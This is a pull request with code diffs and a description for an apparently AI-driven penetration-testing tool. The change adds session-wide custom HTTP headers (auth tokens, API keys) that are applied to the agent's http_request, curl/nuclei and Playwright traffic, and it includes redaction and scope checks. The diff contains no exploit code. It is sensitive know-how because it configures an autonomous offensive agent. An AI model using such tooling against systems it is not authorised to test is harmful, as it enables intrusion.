+ * - bare `--header`s             → that record (mode auto-promotes to custom)
+ * - `--headers default` / unset  → `undefined` (snapshot global defaults)
+ */
+function resolveHeadersFromFlags(
+  flags: WebCommandFlags,
+): Record<string, string> | undefined {
+  if (flags.headersMode === "none") return {};
+  if (flags.headersMode === "custom") return { ...(flags.customHeaders ?? {}) };
+  return undefined;
+}
 /**
  * Define your application's CommandContext type with specific methods
  */
@@ -172,6 +189,7 @@ export const commands: CommandConfig[] = [
             requireApproval: false,
             target: flags.target,
             sandbox: true,
+            headers: resolveHeadersFromFlags(flags),
           },
           initialSkill: { slug: "pentest", args: skillArgs },
         });
@@ -259,6 +277,7 @@ export const commands: CommandConfig[] = [
           target: flags.target,
           sandbox: flags.sandbox,
           taskDriven: flags.taskDriven,
+          headers: resolveHeadersFromFlags(flags),
         },
       });
     },

--- a/src/tui/command-registry.ts
+++ b/src/tui/command-registry.ts
@@ -10,14 +10,7 @@ import {
   type WebCommandFlags,
 } from "./utils/command-flags";
 
-/**
- * Translate the wizard/CLI header flags into a SessionConfig.headers value.
- *
- * - `--headers none`             → `{}` (explicitly suppresses defaults)
- * - `--headers custom` + `--header`s → that record
- * - bare `--header`s             → that record (mode auto-promotes to custom)
- * - `--headers default` / unset  → `undefined` (snapshot global defaults)
- */
+// `undefined` means "let sessions.create snapshot the global defaults".
 function resolveHeadersFromFlags(
   flags: WebCommandFlags,
 ): Record<string, string> | undefined {

--- a/src/tui/components/commands/operator-wizard.tsx
+++ b/src/tui/components/commands/operator-wizard.tsx
@@ -21,12 +21,6 @@ interface HITLWizardProps {
   initialTarget?: string;
   initialName?: string;
   initialRequireApproval?: boolean;
-  initialAuthUrl?: string;
-  initialAuthUser?: string;
-  initialAuthPass?: string;
-  initialAuthInstructions?: string;
-  initialHeadersMode?: "none" | "default" | "custom";
-  initialCustomHeaders?: Record<string, string>;
   initialModel?: string;
 }
 

--- a/src/tui/components/commands/web-wizard.tsx
+++ b/src/tui/components/commands/web-wizard.tsx
@@ -309,15 +309,15 @@ export default function WebWizard({
         sessionConfig.codebasePath = state.cwd.trim();
       }
 
-      // Headers config
-      if (state.headers.mode !== "default") {
-        sessionConfig.offensiveHeaders = {
-          mode: state.headers.mode,
-          headers:
-            state.headers.mode === "custom"
-              ? state.headers.customHeaders
-              : undefined,
-        };
+      // Headers config — translate the legacy mode-based wizard state to
+      // the flat `headers` map. "default" means "let sessions.create
+      // snapshot the global defaultHeaders" (we don't set anything).
+      // "none" means "explicitly clear all headers". "custom" means
+      // "replace with this exact map".
+      if (state.headers.mode === "none") {
+        sessionConfig.headers = {};
+      } else if (state.headers.mode === "custom") {
+        sessionConfig.headers = { ...state.headers.customHeaders };
       }
 
       // Operator guidance — combine threat model and prompt.

--- a/src/tui/components/commands/web-wizard.tsx
+++ b/src/tui/components/commands/web-wizard.tsx
@@ -309,11 +309,7 @@ export default function WebWizard({
         sessionConfig.codebasePath = state.cwd.trim();
       }
 
-      // Headers config — translate the legacy mode-based wizard state to
-      // the flat `headers` map. "default" means "let sessions.create
-      // snapshot the global defaultHeaders" (we don't set anything).
-      // "none" means "explicitly clear all headers". "custom" means
-      // "replace with this exact map".
+      // "default" leaves headers unset so sessions.create snapshots the global default.
       if (state.headers.mode === "none") {
         sessionConfig.headers = {};
       } else if (state.headers.mode === "custom") {

--- a/src/tui/components/operator-dashboard/index.tsx
+++ b/src/tui/components/operator-dashboard/index.tsx
@@ -1594,12 +1594,8 @@ This three-phase flow is specific to the TUI \`/threat-model\` command. The same
 
       const persist = async (next: Record<string, string>, message: string) => {
         const updated = await sessions.updateSessionHeaders(active.id, next);
-        // INV-header-application: every later tool call must observe the
-        // mutation. The agent's runAgent callback captures `session` in its
-        // dep array, so we MUST update the React state — not just the ref —
-        // or the next turn will run with a stale closure and skip the new
-        // headers entirely. Touching both keeps the ref/state convention
-        // (see sessions.create wiring at the top of this component).
+        // Touch both ref and state — runAgent captures `session` in its
+        // dep array, so a stale closure would skip the new headers.
         sessionRef.current = updated;
         setSession(updated);
         addSystemMessage(message);

--- a/src/tui/components/operator-dashboard/index.tsx
+++ b/src/tui/components/operator-dashboard/index.tsx
@@ -41,6 +41,11 @@ import {
   type RunAgentResult,
   runOffensiveSecurityAgent,
 } from "../../../core/api";
+import { formatParseError, parseHeaderLine } from "../../../core/http/parse";
+import {
+  isSensitiveHeaderName,
+  renderHeaderValue,
+} from "../../../core/http/types";
 import { attachWandbToEventBus } from "../../../core/integrations/wandb/upload";
 import type { OperatorMode, PendingApproval } from "../../../core/operator";
 import {
@@ -139,6 +144,7 @@ export default function OperatorDashboard({
     operatorMode?: OperatorMode;
     sandbox?: boolean;
     taskDriven?: boolean;
+    headers?: Record<string, string>;
   };
 }) {
   const { colors } = useTheme();
@@ -1271,6 +1277,9 @@ export default function OperatorDashboard({
             agentCwd: initialConfig?.sandbox ? undefined : process.cwd(),
             codebasePath: initialConfig?.sandbox ? undefined : process.cwd(),
             taskDriven: initialConfig?.taskDriven,
+            ...(initialConfig?.headers !== undefined
+              ? { headers: { ...initialConfig.headers } }
+              : {}),
           };
           agentResult = await runOffensiveSecurityAgent({
             ...commonInput,
@@ -1572,6 +1581,102 @@ This three-phase flow is specific to the TUI \`/threat-model\` command. The same
     executeCommand("/models");
   }, [executeCommand]);
 
+  const handleHeadersSlash = useCallback(
+    async (op: import("./logic").HeadersOp) => {
+      const active = sessionRef.current;
+      if (!active) {
+        addSystemMessage("No active session — cannot manage headers yet.");
+        return;
+      }
+      const current: Record<string, string> = {
+        ...(active.config?.headers ?? {}),
+      };
+
+      const persist = async (next: Record<string, string>, message: string) => {
+        const updated = await sessions.updateSessionHeaders(active.id, next);
+        // INV-header-application: every later tool call must observe the
+        // mutation. The agent's runAgent callback captures `session` in its
+        // dep array, so we MUST update the React state — not just the ref —
+        // or the next turn will run with a stale closure and skip the new
+        // headers entirely. Touching both keeps the ref/state convention
+        // (see sessions.create wiring at the top of this component).
+        sessionRef.current = updated;
+        setSession(updated);
+        addSystemMessage(message);
+      };
+
+      switch (op.kind) {
+        case "invalid": {
+          addSystemMessage(`/headers: ${op.reason}`);
+          return;
+        }
+        case "list": {
+          const entries = Object.entries(current);
+          if (entries.length === 0) {
+            addSystemMessage("No session headers set.");
+            return;
+          }
+          const lines = entries.map(
+            ([name, value]) =>
+              `${isSensitiveHeaderName(name) ? "* " : "  "}${name}: ${renderHeaderValue(name, value, op.showSecrets)}`,
+          );
+          addSystemMessage(
+            `Session headers (${entries.length}):\n${lines.join("\n")}${op.showSecrets ? "" : "\nPass `/headers list --show` to reveal values."}`,
+          );
+          return;
+        }
+        case "add": {
+          const parsed = parseHeaderLine(op.line);
+          if (!parsed.ok) {
+            addSystemMessage(
+              `/headers add rejected:\n${formatParseError(parsed.error)}`,
+            );
+            return;
+          }
+          const canonical = Object.keys(current).find(
+            (k) => k.toLowerCase() === parsed.value.name.toLowerCase(),
+          );
+          if (canonical && !op.allowOverwrite) {
+            addSystemMessage(
+              `Header "${canonical}" already set. Use \`/headers set\` to overwrite.`,
+            );
+            return;
+          }
+          if (canonical && canonical !== parsed.value.name) {
+            delete current[canonical];
+          }
+          current[parsed.value.name] = parsed.value.value;
+          await persist(
+            current,
+            `Header ${parsed.value.name} updated (value redacted).`,
+          );
+          return;
+        }
+        case "remove": {
+          const canonical = Object.keys(current).find(
+            (k) => k.toLowerCase() === op.name.toLowerCase(),
+          );
+          if (!canonical) {
+            addSystemMessage(`No header named "${op.name}".`);
+            return;
+          }
+          delete current[canonical];
+          await persist(current, `Header ${canonical} removed.`);
+          return;
+        }
+        case "clear": {
+          if (Object.keys(current).length === 0) {
+            addSystemMessage("Headers already empty.");
+            return;
+          }
+          await persist({}, "All session headers cleared.");
+          return;
+        }
+      }
+    },
+    [addSystemMessage],
+  );
+
   const handleCommandExecute = useCallback(
     async (command: string) => {
       const action = routeCommand(command, resolveSkillContent);
@@ -1633,6 +1738,10 @@ This three-phase flow is specific to the TUI \`/threat-model\` command. The same
           );
           return;
         }
+        case "headers": {
+          await handleHeadersSlash(action.op);
+          return;
+        }
         case "execute-command":
           await executeCommand(action.command);
           return;
@@ -1645,6 +1754,7 @@ This three-phase flow is specific to the TUI \`/threat-model\` command. The same
       executeCommand,
       showModelPicker,
       addSystemMessage,
+      handleHeadersSlash,
     ],
   );
 

--- a/src/tui/components/operator-dashboard/logic.ts
+++ b/src/tui/components/operator-dashboard/logic.ts
@@ -70,10 +70,6 @@ export type CommandAction =
   | { type: "headers"; op: HeadersOp }
   | { type: "execute-command"; command: string };
 
-/**
- * Parse the tail of `/headers <subcommand> ...` into a structured op.
- * The leading `/headers` token is stripped by the caller.
- */
 function parseHeadersSlashCommand(rest: string): HeadersOp {
   const trimmed = rest.trim();
   if (!trimmed) {

--- a/src/tui/components/operator-dashboard/logic.ts
+++ b/src/tui/components/operator-dashboard/logic.ts
@@ -76,8 +76,8 @@ export type CommandAction =
  */
 function parseHeadersSlashCommand(rest: string): HeadersOp {
   const trimmed = rest.trim();
-  if (!trimmed || trimmed === "show") {
-    return { kind: "list", showSecrets: trimmed === "show" };
+  if (!trimmed) {
+    return { kind: "list", showSecrets: false };
   }
 
   const [verb, ...tailParts] = trimmed.split(/\s+/);

--- a/src/tui/components/operator-dashboard/logic.ts
+++ b/src/tui/components/operator-dashboard/logic.ts
@@ -17,6 +17,7 @@ const OPERATOR_ALLOWED_COMMANDS = new Set([
   "/skills",
   "/plan",
   "/obfuscate",
+  "/headers",
   "/help",
 ]);
 
@@ -54,18 +55,64 @@ export function resolveSubmit(
 // Command routing
 // ---------------------------------------------------------------------------
 
+export type HeadersOp =
+  | { kind: "list"; showSecrets: boolean }
+  | { kind: "add"; line: string; allowOverwrite: boolean }
+  | { kind: "remove"; name: string }
+  | { kind: "clear" }
+  | { kind: "invalid"; reason: string };
+
 export type CommandAction =
   | { type: "show-models" }
   | { type: "show-plan" }
   | { type: "open-session" }
   | { type: "run-skill"; slug: string; autopilot: boolean }
+  | { type: "headers"; op: HeadersOp }
   | { type: "execute-command"; command: string };
+
+/**
+ * Parse the tail of `/headers <subcommand> ...` into a structured op.
+ * The leading `/headers` token is stripped by the caller.
+ */
+function parseHeadersSlashCommand(rest: string): HeadersOp {
+  const trimmed = rest.trim();
+  if (!trimmed || trimmed === "show") {
+    return { kind: "list", showSecrets: trimmed === "show" };
+  }
+
+  const [verb, ...tailParts] = trimmed.split(/\s+/);
+  const tail = trimmed.slice(verb.length).trim();
+
+  switch (verb.toLowerCase()) {
+    case "list":
+      return { kind: "list", showSecrets: tailParts.includes("--show") };
+    case "add":
+      if (!tail) return { kind: "invalid", reason: 'expected "Name: Value"' };
+      return { kind: "add", line: tail, allowOverwrite: false };
+    case "set":
+      if (!tail) return { kind: "invalid", reason: 'expected "Name: Value"' };
+      return { kind: "add", line: tail, allowOverwrite: true };
+    case "remove":
+    case "rm":
+    case "delete":
+      if (!tail) return { kind: "invalid", reason: "expected header name" };
+      return { kind: "remove", name: tail };
+    case "clear":
+      return { kind: "clear" };
+    default:
+      return {
+        kind: "invalid",
+        reason: `unknown subcommand "${verb}". Use list, add, set, remove, or clear.`,
+      };
+  }
+}
 
 export function routeCommand(
   command: string,
   resolveSkill: (cmd: string) => string | null,
 ): CommandAction {
-  const commandLower = command.trim().replace(/^\/+/, "").toLowerCase();
+  const stripped = command.trim().replace(/^\/+/, "");
+  const commandLower = stripped.toLowerCase();
 
   if (commandLower === "models" || commandLower === "model") {
     return { type: "show-models" };
@@ -81,6 +128,11 @@ export function routeCommand(
 
   if (commandLower === "skills") {
     return { type: "execute-command", command };
+  }
+
+  if (commandLower === "headers" || commandLower.startsWith("headers ")) {
+    const rest = stripped.slice("headers".length);
+    return { type: "headers", op: parseHeadersSlashCommand(rest) };
   }
 
   const autopilot = command.includes("--autopilot");
@@ -241,7 +293,30 @@ You are operating in interactive operator mode. The human operator will guide yo
 
 Target: ${target || "unknown"}
 Stage: ${operatorState.currentStage}
-Command approval: ${approvalEnabled ? "enabled — the operator will approve each tool call" : "disabled — tool calls execute automatically"}${modeSection}`;
+Command approval: ${approvalEnabled ? "enabled — the operator will approve each tool call" : "disabled — tool calls execute automatically"}
+
+## Session-wide Custom HTTP Headers
+
+The operator can attach custom HTTP headers (Authorization tokens, X-API-Key,
+tenant IDs, etc.) that are automatically applied to every in-scope
+\`http_request\`, \`execute_command\` (curl/nuclei/etc.), and Playwright
+navigation. You do NOT have a tool to mutate these — they are operator-owned.
+
+If the operator asks you to "set/add/remove/list a header," do NOT refuse
+and do NOT try to inject it per-call. Tell them to type one of these
+commands directly into the chat input (the slash-command bar, not as a
+message to you):
+
+  /headers add Name: Value     # error if Name already set
+  /headers set Name: Value     # overwrite
+  /headers remove Name
+  /headers list                # masked
+  /headers list --show         # reveal values
+  /headers clear
+
+Once set, the header is applied automatically — you don't need to do
+anything to use it. Per-request \`headers\` you pass to \`http_request\`
+still win over session headers if you need a one-off override.${modeSection}`;
 
   if (skillsCatalog) {
     prompt += `\n\n# Skills\n\n${skillsCatalog}`;

--- a/src/tui/context/route.tsx
+++ b/src/tui/context/route.tsx
@@ -69,13 +69,7 @@ export type Route =
         operatorMode?: import("../../core/operator").OperatorMode;
         sandbox?: boolean;
         taskDriven?: boolean;
-        /**
-         * Session headers carried from the wizard / CLI flags.
-         * When the dashboard creates the session, these are passed to
-         * `sessions.create` (which snapshots them in place of the
-         * global defaults). Subsequent mutations stay scoped to the
-         * session — see updateSessionHeaders.
-         */
+        /** Headers from wizard/CLI; replace the snapshotted global defaults. */
         headers?: Record<string, string>;
       };
       /** Skill to automatically submit on mount */

--- a/src/tui/context/route.tsx
+++ b/src/tui/context/route.tsx
@@ -69,6 +69,14 @@ export type Route =
         operatorMode?: import("../../core/operator").OperatorMode;
         sandbox?: boolean;
         taskDriven?: boolean;
+        /**
+         * Session headers carried from the wizard / CLI flags.
+         * When the dashboard creates the session, these are passed to
+         * `sessions.create` (which snapshots them in place of the
+         * global defaults). Subsequent mutations stay scoped to the
+         * session — see updateSessionHeaders.
+         */
+        headers?: Record<string, string>;
       };
       /** Skill to automatically submit on mount */
       initialSkill?: { slug: string; args?: Record<string, string> };

--- a/src/tui/index.tsx
+++ b/src/tui/index.tsx
@@ -459,6 +459,7 @@ function AppContent({
         requireApproval: false,
         target,
         sandbox: isBlackbox,
+        headers: sessionConfig.headers,
       },
       initialSkill: { slug: "pentest", args: skillArgs },
     });

--- a/src/tui/utils/command-flags.ts
+++ b/src/tui/utils/command-flags.ts
@@ -7,6 +7,7 @@
 
 import { readFileSync } from "fs";
 import { isAbsolute, resolve } from "path";
+import { formatParseError, parseHeaderLine } from "../../core/http/parse";
 import type { OperatorMode } from "../../core/operator";
 import type { SessionConfig } from "../../core/session";
 import { createToolsetState } from "../../core/toolset";
@@ -313,12 +314,14 @@ export function parseWebFlags(args: string[]): WebCommandFlags {
   if (raw.header && Array.isArray(raw.header)) {
     flags.customHeaders = {};
     for (const h of raw.header) {
-      const colonIdx = h.indexOf(":");
-      if (colonIdx > 0) {
-        const name = h.slice(0, colonIdx).trim();
-        const value = h.slice(colonIdx + 1).trim();
-        flags.customHeaders[name] = value;
+      const parsed = parseHeaderLine(h);
+      if (!parsed.ok) {
+        console.error(
+          `--header "${h}" rejected:\n${formatParseError(parsed.error)}`,
+        );
+        continue;
       }
+      flags.customHeaders[parsed.value.name] = parsed.value.value;
     }
     // If we have custom headers, set mode to custom
     if (Object.keys(flags.customHeaders).length > 0 && !flags.headersMode) {
@@ -415,11 +418,10 @@ export function buildOperatorSessionConfig(
     };
   }
 
-  if (flags.headersMode && flags.headersMode !== "default") {
-    sessionConfig.offensiveHeaders = {
-      mode: flags.headersMode,
-      headers: flags.headersMode === "custom" ? flags.customHeaders : undefined,
-    };
+  if (flags.headersMode === "none") {
+    sessionConfig.headers = {};
+  } else if (flags.headersMode === "custom") {
+    sessionConfig.headers = { ...(flags.customHeaders ?? {}) };
   }
 
   sessionConfig.agentCwd = flags.sandbox ? undefined : process.cwd();
@@ -469,11 +471,10 @@ export function buildSwarmSessionConfig(
     };
   }
 
-  if (flags.headersMode && flags.headersMode !== "default") {
-    sessionConfig.offensiveHeaders = {
-      mode: flags.headersMode,
-      headers: flags.headersMode === "custom" ? flags.customHeaders : undefined,
-    };
+  if (flags.headersMode === "none") {
+    sessionConfig.headers = {};
+  } else if (flags.headersMode === "custom") {
+    sessionConfig.headers = { ...(flags.customHeaders ?? {}) };
   }
 
   // Combine threat model and prompt into a single prompt field

--- a/src/tui/utils/command-flags.ts
+++ b/src/tui/utils/command-flags.ts
@@ -319,7 +319,7 @@ export function parseWebFlags(args: string[]): WebCommandFlags {
         console.error(
           `--header "${h}" rejected:\n${formatParseError(parsed.error)}`,
         );
-        continue;
+        process.exit(1);
       }
       flags.customHeaders[parsed.value.name] = parsed.value.value;
     }


### PR DESCRIPTION
### What does this PR do?

Adds a single, end-to-end mechanism for attaching custom HTTP headers (Authorization tokens, `X-API-Key`, tenant IDs, etc.) to every in-scope HTTP request the system makes — from any tool, any agent, any entry point. Once a header is set, it is **always** applied to relevant requests.

#### Problem

Previously, custom-header support was partial and fragile: some tools applied them, others didn't; CLI flags and chat had no shared parser; nothing enforced that target-bound `fetch` calls actually went through a header-aware path. Operators had no reliable way to set a header and trust that `http_request`, `curl` via `execute_command`, and Playwright navigation would all pick it up.

#### Architecture

Layered precedence: **global → session → credential → request**, resolved by a single function:

- **`src/core/http/types.ts`** — minimal shared types
- **`src/core/http/parse.ts`** — total parser with typed errors and helpful hints; one parser used by CLI flags, `pensar config headers`, and the `/headers` slash command
- **`src/core/http/targetHeaders.ts`** — `resolveEffectiveHeaders`, the blessed `targetFetch` wrapper, scope check (registrable domain via `tldts`), `mergeHeadersInto`, `applyHeadersToShellCommand` (fail-closed shell injection for `curl`/`nuclei`/etc.)

All target-bound HTTP traffic now flows through `targetFetch`; the rule below makes that structurally enforced.

#### Where headers are applied

- `http_request` tool — via `targetFetch`
- `execute_command` — shell injection registry rewrites known HTTP tools (`curl`, `wget`, `httpx`, `nuclei`, …); fail-closed on unrecognized tools unless `allow_unprotected: true`
- Playwright — `extraHTTPHeaders` set at browser context launch (`playwrightMcp`) and embedded into inline scripts (`sandboxPlaywright`)
- Subagent spawning (`spawnPentestAgent`) inherits session headers
- POC scripts run by `documentFinding` (headers passed into the sandbox)
- All helper fetches in offensive tooling migrated to `targetFetch`

#### UX surfaces

- **CLI flags** on `pensar pentest`, `pensar targeted-pentest`, `pensar operator`: `--header Name: Value`, `--headers-from <file>`, `--no-global-headers`
- **`pensar config headers`** subcommand (`list`/`add`/`set`/`remove`/`clear`/`import`) for global defaults
- **`/headers` slash command** in operator chat: `add`/`set`/`remove`/`list [--show]`/`clear` — mutates the active session atomically
- Operator-mode system prompt teaches the agent to route header requests to `/headers` rather than refusing or trying to inject per-call (keeps secret values out of the LLM stream)

#### Hygiene & enforcement

- **Redaction** — sensitive header values masked in `/headers list`, in command history (`redactSecretsInHistoryEntry`), and in chat confirmations
- **No secrets to the LLM** — headers are never echoed into the model's input/output; the agent has no tool to mutate them
- **Biome rule** `noRestrictedGlobals` under `src/core/agents/offSecAgent/tools/**` blocks raw `fetch`, forcing `targetFetch` (`INV-blessed-fetch`); the three legitimate non-target call sites (Brave Search, Pensar Console, Microsoft OAuth) carry single-line `biome-ignore` with rationale
- **Session snapshot** — `sessions.create` snapshots global defaults into the session so later global config changes don't silently bleed into running engagements
- **Zod migration** — legacy session.json files are migrated forward on load

#### Schema / config changes

- `Config` gains `defaultHeaders` (and is seeded with `User-Agent: pensar-apex`)
- `SessionConfigObject` gains `headers: Record<string, string>` (flat; replaces the older `OffensiveHeadersConfig` shape; legacy data migrated)
- `CredentialManager` exposes `listCredentialsWithHeaders` for the resolver

#### Notable bug caught during real-world testing

The `/headers` slash command was persisting to disk but the operator dashboard wasn't calling `setSession(updated)` — only `sessionRef.current = updated`. Because `runAgent`'s `useCallback` captures `session` in its dep array, the next turn ran with a stale closure and silently dropped the new header (the chat showed "Header X updated" but the next `curl` had no `X` attached). Fixed by also updating React state, with a comment pinning `INV-header-application` so future contributors don't re-introduce the same gap.

### How did you verify your code works?

Automated:

- `bun run format:check` ✅
- `bun run lint` ✅ (Biome, including the new `noRestrictedGlobals` rule)
- `bun run tsc` ✅
- `bun run test` ✅ — all suites green; **31 new contract tests** in `src/core/http/headers.contract.test.ts` covering the parser, the layered resolver, scope check, `targetFetch`, shell injection (success + fail-closed), history redaction, and sensitive-header masking
- `bun run knip` ✅

Manual:

- End-to-end smoke test in operator mode: `/headers add X-Test: hihi` → next `curl` via `execute_command` attaches the header on the wire (verified against a requestcatcher endpoint).
- CLI: `pensar config headers add` / `list` / `remove` round-trip.
- Sensitive value masking confirmed in `/headers list` (`Authorization`, `Cookie`, `X-API-Key` show `<masked>`; `--show` reveals).

Made with [Cursor](https://cursor.com)

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Changes how auth/API headers are merged, scoped, and sent on pentest traffic; mistakes could leak credentials off-scope or drop headers on tool calls.
> 
> **Overview**
> Introduces a **unified custom HTTP header pipeline** so tokens and API keys can be attached once and applied consistently to in-scope traffic across `http_request`, supported shell scanners (`curl`, `nuclei`, etc.), and Playwright—without leaking secrets to out-of-scope URLs or the LLM.
> 
> **Configuration & entry points:** Global defaults live in `~/.pensar/config.json` (`defaultHeaders`, seeded with `User-Agent: pensar-apex`) via new **`pensar config headers`**. CLI flows (`pentest`, `targeted-pentest`, `operator`) gain **`--header`**, **`--headers-from`**, and **`--no-global-headers`**, merged in **`resolveCliHeaders`** (global &lt; file &lt; flags). Sessions store a flat **`config.headers`** map snapshotted at **`sessions.create`** (replacing **`offensiveHeaders`** with on-load migration).
> 
> **Resolver & enforcement:** New **`src/core/http/*`** (`parse`, `targetHeaders`, `types`) implements layered precedence (session &lt; credential &lt; per-request), scope checks, **`targetFetch`**, and **`applyHeadersToShellCommand`** (fail-closed unless **`allow_unprotected`**). Biome **`noRestrictedGlobals`** blocks raw **`fetch`** under agent tools. Operator **`/headers`** mutates the live session (with a fix so React state updates after persist). Sensitive values are masked in listings and **history redaction**.
> 
> **Tooling updates:** Offensive tools route target HTTP through **`targetFetch`**; Playwright gets **`extraHTTPHeaders`** via MCP config / sandbox scripts, with **`stripBrowserManagedHeaders`** so session User-Agent does not override Chromium’s UA.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 04b12a8f9d3dbdbea4499559948a444194e9eb8e. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->